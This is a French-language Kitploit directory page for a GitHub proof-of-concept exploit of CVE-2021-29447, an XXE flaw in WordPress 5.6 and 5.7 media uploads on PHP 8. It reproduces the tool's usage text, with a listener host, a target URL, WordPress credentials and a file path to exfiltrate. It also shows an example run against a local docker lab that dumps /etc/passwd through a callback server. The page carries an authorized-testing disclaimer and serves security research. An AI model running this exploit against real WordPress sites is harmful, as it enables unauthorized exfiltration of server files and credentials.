Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — PoC pour CVE-2021-29447 | Kitploit
Outils/GitHubGitHub/magicrc/cve-2021-29447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubmagicrc/cve-2021-29447

CVE-2021-29447

PoC pour CVE-2021-29447

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2021-29447 PoC

Ce dépôt contient un exploit de preuve de concept (PoC) pour la vulnérabilité CVE-2021-29447, affectant WordPress 5.6 et 5.7 fonctionnant sous PHP 8. L'exploit démontre comment un attaquant, capable de téléverser des fichiers, peut exploiter une vulnérabilité d'analyse XML dans la bibliothèque de médias, conduisant à une attaque XXE (XML External Entity) et, par conséquent, à l'exfiltration de fichiers locaux de l'environnement cible.


⚠️ AVERTISSEMENT

Ce projet est destiné uniquement à des fins éducatives, de recherche et de tests de sécurité autorisés.
N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
L'auteur n'est pas responsable de tout dommage ou usage abusif.


Utilisation

root@kitploit:~
┌──(magicrc㉿perun)-[~/code/CVE-2021-29447]
└─$ python3 ./CVE-2021-29447.py 
usage: python3 ./CVE-2021-29447.py [--lhost LHOST] [--lport LPORT] [--target TARGET] [--user USER] [--password PASSWORD] [--file FILE] [--timeout TIMEOUT]

options:
  --lhost LHOST        IP address of the HTTP server, must be reachable by the target, server itself binds to 0.0.0.0
  --lport LPORT        Local port for the HTTP server to bind to
  --target TARGET      Full URL of the WordPress target
  --user USER          Username used to authenticate with the WordPress site
  --password PASSWORD  Password for the specified WordPress user
  --file FILE          Absolute path of the file to attempt exfiltration from the target system
  --timeout TIMEOUT    Maximum number of seconds to wait for the exfiltration callback before shutting down the server

Example: python3 ./CVE-2021-29447.py --lhost 10.10.14.157 --lport 8080 --target http://target.com --user user --password pass --file /etc/passwd

Exemple

Basé sur le docker-compose fourni pour wordpress:5.7.0-php8.0.

root@kitploit:~
┌──(magicrc㉿perun)-[~/code/CVE-2021-29447]
└─$ python3 ./CVE-2021-29447.py --lhost 172.17.0.1 --lport 8000 --target http://127.0.0.1:8080 --user admin --password '%rae2eX)mogPXX&$$r' --file /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Télécharger l’outil